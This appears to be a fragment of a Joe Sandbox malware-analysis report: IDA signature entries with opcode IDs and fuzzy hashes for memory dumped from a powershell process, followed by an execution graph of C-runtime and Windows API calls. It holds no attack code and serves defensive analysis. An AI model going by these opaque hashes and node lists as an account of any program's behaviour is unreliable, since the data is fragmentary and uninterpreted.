                                    • Opcode ID: 70b7fbad4bbcb1c2c13a1327c884c10b88f5aa7247a2e2eeee0838a59dd471ce
                                    • Instruction ID: c1e195cd3229b7e5475aef539f184d81ee856ff206ceab93fa055e039e4c2916
                                    • Opcode Fuzzy Hash: 70b7fbad4bbcb1c2c13a1327c884c10b88f5aa7247a2e2eeee0838a59dd471ce
                                    • Instruction Fuzzy Hash: 84E17EF17043069FEB248B7D881866ABBE2EFC2618F1484FBD645CB251DE39C845C3A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$tP]q$tP]q$tP]q$tP]q$$]q$(cq$(cq$(cq$(cq
                                    • API String ID: 0-3029092631
                                    • Opcode ID: c19527b3f0bac01ac5190a3ebb96130708cb413d51649604d1a53f479a44afc9
                                    • Instruction ID: 0056c582d9ead3c787c9935511c4db6a060db5fc82eb84db1207a59f99a15ae7
                                    • Opcode Fuzzy Hash: c19527b3f0bac01ac5190a3ebb96130708cb413d51649604d1a53f479a44afc9
                                    • Instruction Fuzzy Hash: B6B1EDB8700206DFEB24CF68C548A6ABBE6FF84710F5484A5EA055B350DB39DC41CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
                                    • API String ID: 0-3118609902
                                    • Opcode ID: 54650ddc5599980b64e9f63a8fbd451c17703627d98f604a31e4c9e33211f3f5
                                    • Instruction ID: 86ebc7b000e217faca2619725bbb527f63e9d0f66360dd8234b416b6ef562c90
                                    • Opcode Fuzzy Hash: 54650ddc5599980b64e9f63a8fbd451c17703627d98f604a31e4c9e33211f3f5
                                    • Instruction Fuzzy Hash: B1711BF8700206DFEB258F68C55866AB7E2FFC4710F1488A5EA058B394DB39DD45C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                    • API String ID: 0-1910532044
                                    • Opcode ID: 11f27042e636527dfa36c5a7176baa04d9624e603ad99ea7c121e31605304b53
                                    • Instruction ID: a6fd073dcbd7657397265803576cd9410a738d4eaecc8f81a129a134f17e3613
                                    • Opcode Fuzzy Hash: 11f27042e636527dfa36c5a7176baa04d9624e603ad99ea7c121e31605304b53
                                    • Instruction Fuzzy Hash: 4AA15AF17043059FEB248A6C8818676BBE5EFC5628F2488EBD645CB391DE39CC45C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$tP]q$$]q$$]q$$]q
                                    • API String ID: 0-2702571027
                                    • Opcode ID: 2650b9916ceca826efb92016095e2fc3c36607908f6ec515c0009359674a5ac5
                                    • Instruction ID: 57820fe60f63319f61cd6ddcfa3aba0324a0ca26a2931134a88842a3ed8b8ef4
                                    • Opcode Fuzzy Hash: 2650b9916ceca826efb92016095e2fc3c36607908f6ec515c0009359674a5ac5
                                    • Instruction Fuzzy Hash: A161E3F1A10206DFFF248E14E588BBA77A6EF85311F1484E6EA005B294C779DD80CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$$]q$$]q$$]q
                                    • API String ID: 0-2353078639
                                    • Opcode ID: d3c9270ea92b7e8d0f05dd694011c69b8bad3afb74843c049c8724d3ce3720d4
                                    • Instruction ID: 8704e06ae829604cad8a85c0772bd05d7ddbed04340685d793ac628ca5314190
                                    • Opcode Fuzzy Hash: d3c9270ea92b7e8d0f05dd694011c69b8bad3afb74843c049c8724d3ce3720d4
                                    • Instruction Fuzzy Hash: 6D4159F17043019FEB256B299854BBB7BA2EFC1200F1044AADA45CB295DF3AC845C7E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$$]q$$]q$$]q
                                    • API String ID: 0-2353078639
                                    • Opcode ID: 51b1b9db4b7b83311ace0c6c45e047ed1ee8cd912ba97bc031ce152560044e26
                                    • Instruction ID: dcb8a0b138d8288d7973e20215202121ea22f9efa159ce67b6e3a737f482a3d3
                                    • Opcode Fuzzy Hash: 51b1b9db4b7b83311ace0c6c45e047ed1ee8cd912ba97bc031ce152560044e26
                                    • Instruction Fuzzy Hash: 20316BFAB04307CFEB250A699458676B7E5FFD1110B3844FACA45CA285DE3DC419CB61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$d%cq$d%cq$d%cq$tP]q
                                    • API String ID: 0-1723543176
                                    • Opcode ID: f46ff1434405377a08d78e0075162b7cb44748d4407d42d6051854fe39b9db6d
                                    • Instruction ID: c16333ee3444aa8df432383d0b910874fa5aa51ab2528748de607c0ea3fd53ea
                                    • Opcode Fuzzy Hash: f46ff1434405377a08d78e0075162b7cb44748d4407d42d6051854fe39b9db6d
                                    • Instruction Fuzzy Hash: D831C1B4B002159FDB24CF68C584A5DB7A2FB88710F148999EA056B355D736DD01CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (o]q$(o]q$(o]q$(o]q
                                    • API String ID: 0-1261621458
                                    • Opcode ID: 9401356cce11d33c62dd5675834e16e0d55c884d51539d942569797570c34c2a
                                    • Instruction ID: 1f9da34e3c8c5bc24783c612b6f9e5010bc8ff074b4fd7dd091200dfd5666b67
                                    • Opcode Fuzzy Hash: 9401356cce11d33c62dd5675834e16e0d55c884d51539d942569797570c34c2a
                                    • Instruction Fuzzy Hash: 34F129F5704309DFEF249F68C8487AABBA1FF85310F1484AAE6058B291DB39D845C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$4']q$4']q
                                    • API String ID: 0-1785108022
                                    • Opcode ID: 13d45a279b2264b3392424622d3e87a124dad1acb91f4565fd96420a2e2b15ce
                                    • Instruction ID: d0520828a1e5a1c43e47096c5168d0d6b018a89ac58a4c08cd14297f056698c3
                                    • Opcode Fuzzy Hash: 13d45a279b2264b3392424622d3e87a124dad1acb91f4565fd96420a2e2b15ce
                                    • Instruction Fuzzy Hash: C47114F1B043168FDB258A6895186ABBBF5EFC2311F3484FAC645CB211DB39C946C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XRbq$XRbq$tP]q$$]q
                                    • API String ID: 0-2385373255
                                    • Opcode ID: 90a477b626a79b244c139e34b577b95887b7f775ce46a23bf4e37d306b4a1975
                                    • Instruction ID: 17acd0eba0471ea341050d1d8692f127250b5c9479e4b88f40c1e303b73f1b3b
                                    • Opcode Fuzzy Hash: 90a477b626a79b244c139e34b577b95887b7f775ce46a23bf4e37d306b4a1975
                                    • Instruction Fuzzy Hash: C341B5F1A00205DFEB24CE18E548ABAB7F2EF45714F29C0E9E5149B261C739DD40CBA0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XRbq$XRbq$tP]q$$]q
                                    • API String ID: 0-2385373255
                                    • Opcode ID: 4c3ca94755ac492228896ae3a904c815829609408621a0c4b869e58aae7929f9
                                    • Instruction ID: 1774339581d228bf091537d50d4fd4af5ef0625e1d7435efa0fe219830683bdf
                                    • Opcode Fuzzy Hash: 4c3ca94755ac492228896ae3a904c815829609408621a0c4b869e58aae7929f9
                                    • Instruction Fuzzy Hash: 8A41A4F1A00105DFEB24CE18E148ABAB7F2EB89714F29C4E9E6149B260C739DD40CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $]q$$]q$$]q$$]q
                                    • API String ID: 0-858218434
                                    • Opcode ID: 10d70aee22e53da67e8b233aa47bd0696a4c8749e2b1c8b1755617ee46e51d56
                                    • Instruction ID: 14e3c9a01043a63f4fa6373ae9b63b3b413cd548e399230d431693202a7b4f9e
                                    • Opcode Fuzzy Hash: 10d70aee22e53da67e8b233aa47bd0696a4c8749e2b1c8b1755617ee46e51d56
                                    • Instruction Fuzzy Hash: E5213AF13043065BFB38596E594877777DADBC1A11F24887ED609CB381CE3AE4008361
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $]q$$]q$$]q$$]q
                                    • API String ID: 0-858218434
                                    • Opcode ID: 42aac111cf56c01525cce3ecce2aaac43faebfce2282926e6d65618222ba9347
                                    • Instruction ID: eb2c617a00cd5c79e9b018d42ae8e8de0df74345e9690d12c11b7b37c6301b8e
                                    • Opcode Fuzzy Hash: 42aac111cf56c01525cce3ecce2aaac43faebfce2282926e6d65618222ba9347
                                    • Instruction Fuzzy Hash: B42108F5A053069FEF359E548A446667BF0EF42210F29C0E7DA45A7282E63DC445CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$$]q$$]q
                                    • API String ID: 0-978391646
                                    • Opcode ID: 42a78fadf447d0f7c92b1fc2bec99d63f4bf1a631bbb70e6044e695e59981e6e
                                    • Instruction ID: 5e2e6a721da529f7c9df53ca9d52f632ebd8d8d190446001b2d6fb2c0723bcf7
                                    • Opcode Fuzzy Hash: 42a78fadf447d0f7c92b1fc2bec99d63f4bf1a631bbb70e6044e695e59981e6e
                                    • Instruction Fuzzy Hash: 870126B170C7868FD72A666E19205246FB69F8290171A48E7C581CF366C91C8C098357

                                    Execution Graph

                                    Execution Coverage:2.5%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:1.3%
                                    Total number of Nodes:1661
                                    Total number of Limit Nodes:5
                                    execution_graph 7995 23dc281c 7996 23dc2882 std::exception::exception 27 API calls 7995->7996 7997 23dc282a 7996->7997 6270 23dc4bdd 6271 23dc4bec 6270->6271 6272 23dc4c08 6270->6272 6271->6272 6274 23dc4bf2 6271->6274 6296 23dc6d60 6272->6296 6276 23dc6368 __dosmaperr 20 API calls 6274->6276 6278 23dc4bf7 6276->6278 6277 23dc4c33 6300 23dc4d01 6277->6300 6293 23dc62ac 6278->6293 6281 23dc4c01 6285 23dc4c66 6287 23dc6368 __dosmaperr 20 API calls 6285->6287 6286 23dc4c72 6288 23dc4d01 38 API calls 6286->6288 6289 23dc4c6b 6287->6289 6290 23dc4c88 6288->6290 6291 23dc571e _free 20 API calls 6289->6291 6290->6289 6292 23dc571e _free 20 API calls 6290->6292 6291->6281 6292->6289 6312 23dc6231 6293->6312 6295 23dc62b8 6295->6281 6297 23dc6d69 6296->6297 6298 23dc4c0f GetModuleFileNameA 6296->6298 6333 23dc6c5f 6297->6333 6298->6277 6302 23dc4d26 6300->6302 6304 23dc4d86 6302->6304 6819 23dc70eb 6302->6819 6303 23dc4c50 6306 23dc4e76 6303->6306 6304->6303 6305 23dc70eb 38 API calls 6304->6305 6305->6304 6307 23dc4c5d 6306->6307 6308 23dc4e8b 6306->6308 6307->6285 6307->6286 6308->6307 6309 23dc637b _abort 20 API calls 6308->6309 6310 23dc4eb9 6309->6310 6311 23dc571e _free 20 API calls 6310->6311 6311->6307 6313 23dc5b7a _abort 20 API calls 6312->6313 6314 23dc6247 6313->6314 6315 23dc62a6 6314->6315 6316 23dc6255 6314->6316 6323 23dc62bc IsProcessorFeaturePresent 6315->6323 6320 23dc2ada _ValidateLocalCookies 5 API calls 6316->6320 6318 23dc62ab 6319 23dc6231 _abort 26 API calls 6318->6319 6321 23dc62b8 6319->6321 6322 23dc627c 6320->6322 6321->6295 6322->6295 6324 23dc62c7 6323->6324 6327 23dc60e2 6324->6327 6328 23dc60fe ___scrt_fastfail 6327->6328 6329 23dc612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6328->6329 6330 23dc61fb ___scrt_fastfail 6329->6330 6331 23dc2ada _ValidateLocalCookies 5 API calls 6330->6331 6332 23dc6219 GetCurrentProcess TerminateProcess 6331->6332 6332->6318 6353 23dc5af6 GetLastError 6333->6353 6335 23dc6c6c 6373 23dc6d7e 6335->6373 6337 23dc6c74 6382 23dc69f3 6337->6382 6344 23dc571e _free 20 API calls 6346 23dc6c8b 6344->6346 6345 23dc6cc9 6347 23dc6368 __dosmaperr 20 API calls 6345->6347 6346->6298 6352 23dc6cce 6347->6352 6348 23dc6d12 6348->6352 6406 23dc68c9 6348->6406 6349 23dc6ce6 6349->6348 6350 23dc571e _free 20 API calls 6349->6350 6350->6348 6352->6344 6354 23dc5b0c 6353->6354 6355 23dc5b12 6353->6355 6356 23dc5e08 _abort 11 API calls 6354->6356 6357 23dc637b _abort 20 API calls 6355->6357 6359 23dc5b61 SetLastError 6355->6359 6356->6355 6358 23dc5b24 6357->6358 6360 23dc5e5e _abort 11 API calls 6358->6360 6365 23dc5b2c 6358->6365 6359->6335 6362 23dc5b41 6360->6362 6361 23dc571e _free 20 API calls 6363 23dc5b32 6361->6363 6364 23dc5b48 6362->6364 6362->6365 6366 23dc5b6d SetLastError 6363->6366 6367 23dc593c _abort 20 API calls 6364->6367 6365->6361 6409 23dc55a8 6366->6409 6368 23dc5b53 6367->6368 6370 23dc571e _free 20 API calls 6368->6370 6372 23dc5b5a 6370->6372 6372->6359 6372->6366 6374 23dc6d8a ___scrt_is_nonwritable_in_current_image 6373->6374 6375 23dc5af6 _abort 38 API calls 6374->6375 6376 23dc6d94 6375->6376 6379 23dc6e18 _abort 6376->6379 6380 23dc55a8 _abort 38 API calls 6376->6380 6381 23dc571e _free 20 API calls 6376->6381 6558 23dc5671 RtlEnterCriticalSection 6376->6558 6559 23dc6e0f 6376->6559 6379->6337 6380->6376 6381->6376 6563 23dc54a7 6382->6563 6385 23dc6a14 GetOEMCP 6387 23dc6a3d 6385->6387 6386 23dc6a26 6386->6387 6388 23dc6a2b GetACP 6386->6388 6387->6346 6389 23dc56d0 6387->6389 6388->6387 6390 23dc570e 6389->6390 6394 23dc56de _abort 6389->6394 6392 23dc6368 __dosmaperr 20 API calls 6390->6392 6391 23dc56f9 RtlAllocateHeap 6393 23dc570c 6391->6393 6391->6394 6392->6393 6393->6352 6396 23dc6e20 6393->6396 6394->6390 6394->6391 6395 23dc474f _abort 7 API calls 6394->6395 6395->6394 6397 23dc69f3 40 API calls 6396->6397 6399 23dc6e3f 6397->6399 6398 23dc2ada _ValidateLocalCookies 5 API calls 6400 23dc6cc1 6398->6400 6401 23dc6e90 IsValidCodePage 6399->6401 6403 23dc6e46 6399->6403 6405 23dc6eb5 ___scrt_fastfail 6399->6405 6400->6345 6400->6349 6402 23dc6ea2 GetCPInfo 6401->6402 6401->6403 6402->6403 6402->6405 6403->6398 6710 23dc6acb GetCPInfo 6405->6710 6783 23dc6886 6406->6783 6408 23dc68ed 6408->6352 6420 23dc7613 6409->6420 6412 23dc55b8 6414 23dc55c2 IsProcessorFeaturePresent 6412->6414 6415 23dc55e0 6412->6415 6416 23dc55cd 6414->6416 6450 23dc4bc1 6415->6450 6418 23dc60e2 _abort 8 API calls 6416->6418 6418->6415 6453 23dc7581 6420->6453 6423 23dc766e 6424 23dc767a _abort 6423->6424 6425 23dc5b7a _abort 20 API calls 6424->6425 6429 23dc76a7 _abort 6424->6429 6431 23dc76a1 _abort 6424->6431 6425->6431 6426 23dc76f3 6427 23dc6368 __dosmaperr 20 API calls 6426->6427 6428 23dc76f8 6427->6428 6432 23dc62ac _abort 26 API calls 6428->6432 6435 23dc771f 6429->6435 6467 23dc5671 RtlEnterCriticalSection 6429->6467 6431->6426 6431->6429 6449 23dc76d6 6431->6449 6432->6449 6436 23dc777e 6435->6436 6438 23dc7776 6435->6438 6446 23dc77a9 6435->6446 6468 23dc56b9 RtlLeaveCriticalSection 6435->6468 6436->6446 6469 23dc7665 6436->6469 6441 23dc4bc1 _abort 28 API calls 6438->6441 6441->6436 6444 23dc5af6 _abort 38 API calls 6447 23dc780c 6444->6447 6445 23dc7665 _abort 38 API calls 6445->6446 6472 23dc782e 6446->6472 6448 23dc5af6 _abort 38 API calls 6447->6448 6447->6449 6448->6449 6476 23dcbdc9 6449->6476 6480 23dc499b 6450->6480 6456 23dc7527 6453->6456 6455 23dc55ad 6455->6412 6455->6423 6457 23dc7533 ___scrt_is_nonwritable_in_current_image 6456->6457 6462 23dc5671 RtlEnterCriticalSection 6457->6462 6459 23dc7541 6463 23dc7575 6459->6463 6461 23dc7568 _abort 6461->6455 6462->6459 6466 23dc56b9 RtlLeaveCriticalSection 6463->6466 6465 23dc757f 6465->6461 6466->6465 6467->6435 6468->6438 6470 23dc5af6 _abort 38 API calls 6469->6470 6471 23dc766a 6470->6471 6471->6445 6473 23dc77fd 6472->6473 6474 23dc7834 6472->6474 6473->6444 6473->6447 6473->6449 6479 23dc56b9 RtlLeaveCriticalSection 6474->6479 6477 23dc2ada _ValidateLocalCookies 5 API calls 6476->6477 6478 23dcbdd4 6477->6478 6478->6478 6479->6473 6481 23dc49a7 _abort 6480->6481 6482 23dc49bf 6481->6482 6502 23dc4af5 GetModuleHandleW 6481->6502 6511 23dc5671 RtlEnterCriticalSection 6482->6511 6489 23dc49c7 6498 23dc4a3c 6489->6498 6501 23dc4a65 6489->6501 6512 23dc527a 6489->6512 6490 23dc4aae 6494 23dcbdc9 _abort 5 API calls 6490->6494 6491 23dc4a82 6522 23dc4ab4 6491->6522 6499 23dc4ab3 6494->6499 6496 23dc4669 _abort 5 API calls 6496->6501 6500 23dc4a54 6498->6500 6515 23dc4669 6498->6515 6500->6496 6519 23dc4aa5 6501->6519 6503 23dc49b3 6502->6503 6503->6482 6504 23dc4b39 GetModuleHandleExW 6503->6504 6505 23dc4b63 GetProcAddress 6504->6505 6506 23dc4b78 6504->6506 6505->6506 6507 23dc4b8c FreeLibrary 6506->6507 6508 23dc4b95 6506->6508 6507->6508 6509 23dc2ada _ValidateLocalCookies 5 API calls 6508->6509 6510 23dc4b9f 6509->6510 6510->6482 6511->6489 6530 23dc5132 6512->6530 6516 23dc4698 6515->6516 6517 23dc2ada _ValidateLocalCookies 5 API calls 6516->6517 6518 23dc46c1 6517->6518 6518->6500 6551 23dc56b9 RtlLeaveCriticalSection 6519->6551 6521 23dc4a7e 6521->6490 6521->6491 6552 23dc6025 6522->6552 6525 23dc4ae2 6528 23dc4b39 _abort 8 API calls 6525->6528 6526 23dc4ac2 GetPEB 6526->6525 6527 23dc4ad2 GetCurrentProcess TerminateProcess 6526->6527 6527->6525 6529 23dc4aea ExitProcess 6528->6529 6533 23dc50e1 6530->6533 6532 23dc5156 6532->6498 6534 23dc50ed ___scrt_is_nonwritable_in_current_image 6533->6534 6541 23dc5671 RtlEnterCriticalSection 6534->6541 6536 23dc50fb 6542 23dc515a 6536->6542 6540 23dc5119 _abort 6540->6532 6541->6536 6543 23dc517a 6542->6543 6546 23dc5182 6542->6546 6544 23dc2ada _ValidateLocalCookies 5 API calls 6543->6544 6545 23dc5108 6544->6545 6548 23dc5126 6545->6548 6546->6543 6547 23dc571e _free 20 API calls 6546->6547 6547->6543 6549 23dc56b9 _abort RtlLeaveCriticalSection 6548->6549 6550 23dc5130 6549->6550 6550->6540 6551->6521 6553 23dc604a 6552->6553 6557 23dc6040 6552->6557 6554 23dc5c45 _abort 5 API calls 6553->6554 6554->6557 6555 23dc2ada _ValidateLocalCookies 5 API calls 6556 23dc4abe 6555->6556 6556->6525 6556->6526 6557->6555 6558->6376 6562 23dc56b9 RtlLeaveCriticalSection 6559->6562 6561 23dc6e16 6561->6376 6562->6561 6564 23dc54c4 6563->6564 6570 23dc54ba 6563->6570 6565 23dc5af6 _abort 38 API calls 6564->6565 6564->6570 6566 23dc54e5 6565->6566 6571 23dc7a00 6566->6571 6570->6385 6570->6386 6572 23dc54fe 6571->6572 6573 23dc7a13 6571->6573 6575 23dc7a2d 6572->6575 6573->6572 6579 23dc7f0f 6573->6579 6576 23dc7a55 6575->6576 6577 23dc7a40 6575->6577 6576->6570 6577->6576 6578 23dc6d7e __fassign 38 API calls 6577->6578 6578->6576 6580 23dc7f1b ___scrt_is_nonwritable_in_current_image 6579->6580 6581 23dc5af6 _abort 38 API calls 6580->6581 6582 23dc7f24 6581->6582 6585 23dc7f72 _abort 6582->6585 6591 23dc5671 RtlEnterCriticalSection 6582->6591 6584 23dc7f42 6592 23dc7f86 6584->6592 6585->6572 6590 23dc55a8 _abort 38 API calls 6590->6585 6591->6584 6593 23dc7f94 __fassign 6592->6593 6595 23dc7f56 6592->6595 6593->6595 6599 23dc7cc2 6593->6599 6596 23dc7f75 6595->6596 6709 23dc56b9 RtlLeaveCriticalSection 6596->6709 6598 23dc7f69 6598->6585 6598->6590 6601 23dc7d42 6599->6601 6603 23dc7cd8 6599->6603 6602 23dc571e _free 20 API calls 6601->6602 6625 23dc7d90 6601->6625 6604 23dc7d64 6602->6604 6603->6601 6607 23dc7d0b 6603->6607 6609 23dc571e _free 20 API calls 6603->6609 6605 23dc571e _free 20 API calls 6604->6605 6606 23dc7d77 6605->6606 6611 23dc571e _free 20 API calls 6606->6611 6612 23dc571e _free 20 API calls 6607->6612 6626 23dc7d2d 6607->6626 6608 23dc571e _free 20 API calls 6613 23dc7d37 6608->6613 6615 23dc7d00 6609->6615 6610 23dc7d9e 6614 23dc7dfe 6610->6614 6621 23dc571e 20 API calls _free 6610->6621 6616 23dc7d85 6611->6616 6617 23dc7d22 6612->6617 6618 23dc571e _free 20 API calls 6613->6618 6619 23dc571e _free 20 API calls 6614->6619 6627 23dc90ba 6615->6627 6622 23dc571e _free 20 API calls 6616->6622 6655 23dc91b8 6617->6655 6618->6601 6624 23dc7e04 6619->6624 6621->6610 6622->6625 6624->6595 6667 23dc7e35 6625->6667 6626->6608 6628 23dc91b4 6627->6628 6630 23dc90cb 6627->6630 6628->6607 6629 23dc90dc 6632 23dc90ee 6629->6632 6633 23dc571e _free 20 API calls 6629->6633 6630->6629 6631 23dc571e _free 20 API calls 6630->6631 6631->6629 6634 23dc9100 6632->6634 6635 23dc571e _free 20 API calls 6632->6635 6633->6632 6636 23dc9112 6634->6636 6637 23dc571e _free 20 API calls 6634->6637 6635->6634 6638 23dc9124 6636->6638 6639 23dc571e _free 20 API calls 6636->6639 6637->6636 6640 23dc9136 6638->6640 6641 23dc571e _free 20 API calls 6638->6641 6639->6638 6642 23dc9148 6640->6642 6643 23dc571e _free 20 API calls 6640->6643 6641->6640 6644 23dc915a 6642->6644 6645 23dc571e _free 20 API calls 6642->6645 6643->6642 6646 23dc916c 6644->6646 6647 23dc571e _free 20 API calls 6644->6647 6645->6644 6648 23dc917e 6646->6648 6649 23dc571e _free 20 API calls 6646->6649 6647->6646 6650 23dc9190 6648->6650 6651 23dc571e _free 20 API calls 6648->6651 6649->6648 6652 23dc91a2 6650->6652 6653 23dc571e _free 20 API calls 6650->6653 6651->6650 6652->6628 6654 23dc571e _free 20 API calls 6652->6654 6653->6652 6654->6628 6656 23dc91c5 6655->6656 6666 23dc921d 6655->6666 6657 23dc91d5 6656->6657 6658 23dc571e _free 20 API calls 6656->6658 6659 23dc571e _free 20 API calls 6657->6659 6661 23dc91e7 6657->6661 6658->6657 6659->6661 6660 23dc91f9 6662 23dc920b 6660->6662 6664 23dc571e _free 20 API calls 6660->6664 6661->6660 6663 23dc571e _free 20 API calls 6661->6663 6665 23dc571e _free 20 API calls 6662->6665 6662->6666 6663->6660 6664->6662 6665->6666 6666->6626 6668 23dc7e42 6667->6668 6672 23dc7e60 6667->6672 6668->6672 6673 23dc925d 6668->6673 6671 23dc571e _free 20 API calls 6671->6672 6672->6610 6674 23dc7e5a 6673->6674 6675 23dc926e 6673->6675 6674->6671 6676 23dc9221 __fassign 20 API calls 6675->6676 6677 23dc9276 6676->6677 6678 23dc9221 __fassign 20 API calls 6677->6678 6679 23dc9281 6678->6679 6680 23dc9221 __fassign 20 API calls 6679->6680 6681 23dc928c 6680->6681 6682 23dc9221 __fassign 20 API calls 6681->6682 6683 23dc9297 6682->6683 6684 23dc9221 __fassign 20 API calls 6683->6684 6685 23dc92a5 6684->6685 6686 23dc571e _free 20 API calls 6685->6686 6687 23dc92b0 6686->6687 6688 23dc571e _free 20 API calls 6687->6688 6689 23dc92bb 6688->6689 6690 23dc571e _free 20 API calls 6689->6690 6691 23dc92c6 6690->6691 6692 23dc9221 __fassign 20 API calls 6691->6692 6693 23dc92d4 6692->6693 6694 23dc9221 __fassign 20 API calls 6693->6694 6695 23dc92e2 6694->6695 6696 23dc9221 __fassign 20 API calls 6695->6696 6697 23dc92f3 6696->6697 6698 23dc9221 __fassign 20 API calls 6697->6698 6699 23dc9301 6698->6699 6700 23dc9221 __fassign 20 API calls 6699->6700 6701 23dc930f 6700->6701 6702 23dc571e _free 20 API calls 6701->6702 6703 23dc931a 6702->6703 6704 23dc571e _free 20 API calls 6703->6704 6705 23dc9325 6704->6705 6706 23dc571e _free 20 API calls 6705->6706 6707 23dc9330 6706->6707 6708 23dc571e _free 20 API calls 6707->6708 6708->6674 6709->6598 6711 23dc6baf 6710->6711 6717 23dc6b05 6710->6717 6714 23dc2ada _ValidateLocalCookies 5 API calls 6711->6714 6716 23dc6c5b 6714->6716 6716->6403 6720 23dc86e4 6717->6720 6719 23dc8a3e 43 API calls 6719->6711 6721 23dc54a7 __fassign 38 API calls 6720->6721 6722 23dc8704 MultiByteToWideChar 6721->6722 6724 23dc8742 6722->6724 6732 23dc87da 6722->6732 6725 23dc8763 ___scrt_fastfail 6724->6725 6728 23dc56d0 21 API calls 6724->6728 6727 23dc87d4 6725->6727 6731 23dc87a8 MultiByteToWideChar 6725->6731 6726 23dc2ada _ValidateLocalCookies 5 API calls 6729 23dc6b66 6726->6729 6739 23dc8801 6727->6739 6728->6725 6734 23dc8a3e 6729->6734 6731->6727 6733 23dc87c4 GetStringTypeW 6731->6733 6732->6726 6733->6727 6735 23dc54a7 __fassign 38 API calls 6734->6735 6736 23dc8a51 6735->6736 6743 23dc8821 6736->6743 6740 23dc880d 6739->6740 6742 23dc881e 6739->6742 6741 23dc571e _free 20 API calls 6740->6741 6740->6742 6741->6742 6742->6732 6744 23dc883c 6743->6744 6745 23dc8862 MultiByteToWideChar 6744->6745 6746 23dc888c 6745->6746 6747 23dc8a16 6745->6747 6752 23dc56d0 21 API calls 6746->6752 6753 23dc88ad 6746->6753 6748 23dc2ada _ValidateLocalCookies 5 API calls 6747->6748 6749 23dc6b87 6748->6749 6749->6719 6750 23dc8962 6756 23dc8801 __freea 20 API calls 6750->6756 6751 23dc88f6 MultiByteToWideChar 6751->6750 6754 23dc890f 